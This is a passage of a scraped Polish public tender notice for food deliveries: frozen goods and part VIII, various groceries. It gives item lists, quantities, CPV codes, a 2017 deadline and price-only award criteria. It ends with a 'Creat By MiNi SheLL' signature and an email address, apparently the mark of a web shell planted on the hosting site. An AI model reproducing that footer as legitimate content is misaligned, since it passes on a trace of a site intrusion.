6	Pyzy ziemniaczane mrożone z mięsem 1kg	szt.	150
7	Pyzy ziemniaczane mrożone 1kg	szt.	150
8	Truskawki mrożone całe owoce 1kg	szt.	50
9	Makrela wędzona	kg	80
10	Filet z  tilapii	kg	150
11	Filet z mintaja  	kg	150
12	Filet z dorsza bałtyckiego lub atlantyckiego	kg	150
13	Brokuły róża 1kg	szt.	160
14	Filet z morszczuka	kg	150
15	Pierogi z serem 1kg	szt.	100
16	Zupa jarzynowa mrożona 8 składników	kg	150
17	Barszcz ukraiński mrożony	kg	80
18	Filet śledziowy Matjas	kg	60

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15896000-5, 15221000-3,
                    15234000-7,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VIII
                  
                <b>Nazwa: </b> RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>  1.	Przewidywana częstotliwość dostaw  codziennie od poniedziałku do piątku nie później niż  do godz. 8.30 rano
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na  bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże, w pierwszym gatunku,  zgodne z obowiązującymi normami.
5.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.

1	Budyń 64g bez cukru na  litra mleka 	szt.	200
2	Barszcz biały w proszku na naturalnym zakwasie z dodatkiem mąki pszennej bez glutaminianu sodu i innych ulepszaczy 80g	szt.	300
3	Chrzan  tarty delikatesowy ostry na kwasku cytrynowym pasteryzowany bez konserwantów innych dodatków op. 290g	szt.	40
4	Dżem niskosłodzony różne smaki 280g,Sporządzony z 40g owoców na 100g produktu	szt.	450
5	Przyprawa gyros 20g	szt.	30
6	Cukier biały kryształ 1kg	szt.	400
7	Śliwka suszona 200g	szt.	15
8	Cukier wanilinowy 32g	szt.	40
9	Groszek konserwowy puszka z otwarciem 400g o zawartości masy netto 240g	szt.	300
10	Herbata wieloowocowa 80g	szt.	150
11	Fasola biała drobna sucha 1kg	szt.	50
12	Groch łuskany połówki 1kg	szt.	50
13	Herbata liściasta 80g	szt.	200
14	Kawa INKA 150g	szt.	60
15	Kakao 100 g wartość odżywcza w 100g produktu: wartość energetyczna 1276kj/307kcal, białko 204g, węglowodany 15,6g, tłuszcz 11g	szt.	160
16	Koncentrat pomidorowy 30-35% op.190g, bez sztucznych barwników i konserwantów, pasteryzowany	szt.	400
17	Ketchup 500g, (łagodny/pikantny),skład: 163g pomidorów na 100g produktu	szt.	200
18	Kukurydza w puszce z otwarciem 400g	szt.	200
19	Kasza manna 1kg	szt.	40
20	Kasza gryczana  1kg	szt.	100
21	Kasza jęczmienna średnia 1kg	szt.	40
22	Makaron zacierka 250g	szt.	50
23	Kasza pęczak 1kg	szt.	60
24	Mąka ziemniaczana 1kg	szt.	5
25	Liść laurowy 10g	szt.	100
26	Mąka pszenna  kurpiowska 1kg	szt.	300
27	Przyprawa bazylia  liść suszony krojony 5g	szt.	10
28	Przyprawa curry 25g	szt.	10
29	Przyprawa do mięsa mielonego 20g	szt.	30
30	Przyprawa do ryb 20g	szt.	30
31	Ocet jabłkowy 200ml	szt.	20
32	Makaron bez ulepszaczy z mąki z pszenicy różne rodzaje -500g	szt.	600
33	Miód naturalny bez dodatków 380g	szt.	20
34	Majeranek 10g	szt.	100
35	Musztarda sarepska w opakowaniach szklanych bez konserwantów na produktach krajowych 170g	szt.	100
36	Przyprawa estragon 10g	szt.	5
37	Płatki kukurydziane 250g	szt.	60
38	Olej rzepakowy, rafinowany o zawartości kwasów jednonasyconych powyżej 50% i zawartości kwasów wielonienasyconych powyżej 40%opak. 1 l	szt.	190
39	Pieprz czarny mielony 15g	szt.	250
40	Pieprz ziarnisty 15g	szt.	100
41	Sól warzona, jodowana 1kg	szt.	100
42	Przyprawa gałka muszkatołowa mielona 15g	szt.	10
43	Przyprawa imbir mielony 50g	szt.	10
44	Ziele angielskie w ziarnach 14g	szt.	100
45	Sezamki 27g	szt.	600
46	Przyprawa kminek 20g	szt.	10
47	Przyprawa oregano 10g	szt.	10
48	Czekolada gorzka z orzechami 100g	szt.	180
49	Przyprawa tymianek 10g	szt.	10
50	Przyprawa warzywna (zmielone warzywa i przyprawy bez konserwantów i glutaminianu sodu)opakowanie 500g	szt.	30
51	Orzechy włoskie łuskane 100g	szt.	600
52	Rodzynki sułtańskie 100g	szt.	600
53	Oliwki czarne 180g	szt.	10
54	Oliwki zielone 180g	szt.	10
55	Otręby pszenne 150g	szt.	30
56	Otręby żytnie 150g	szt.	30
57	Papryka mielona ostra 20g	szt.	20
58	Papryka mielona słodka 20g	szt.	20
59	Pieczywo chrupkie różne rodzaje 100g	szt.	60
60	Koperek suszony 20g	szt.	50
61	Płatki śniadaniowe różne rodzaje o zawartości mniejszej niż 10 gram soli, 10 gram cukru w 100g produktu 250 g	szt.	60
62	Płatki ryżowe 200g	szt.	40
63	Ryż biały długo ziarnisty 1kg	szt.	100
64	Słonecznik łuskany 100g	szt.	600
65	Soki owocowe, owocowo-warzywne, warzywne, naturalne, bez dodatku cukru, konserwantów, przeciwutleniaczy, pasteryzowane opak. 330ml	szt.	120
66	Kwasek cytrynowy 10g	szt.	50
67	Woda mineralna niegazowana  0,5 litra	szt.	600
68	Zioła prowansalskie 10g	szt.	10
69	Żurek na naturalnym zakwasie 500ml	szt.	20
70	Morele suszone 200g	szt.	10
71	Sosy winegret 9g	szt.	50
72	Ogórki konserwowe 0,9l	szt.	150
73	Kompot: truskawka, wiśnia, czarna porzeczka 0,9l	szt.	170
74	Majonez 0,9l	szt.	150

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15200000-0,
                    15300000-1,
                    15400000-2,
                    15600000-4,
                    15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com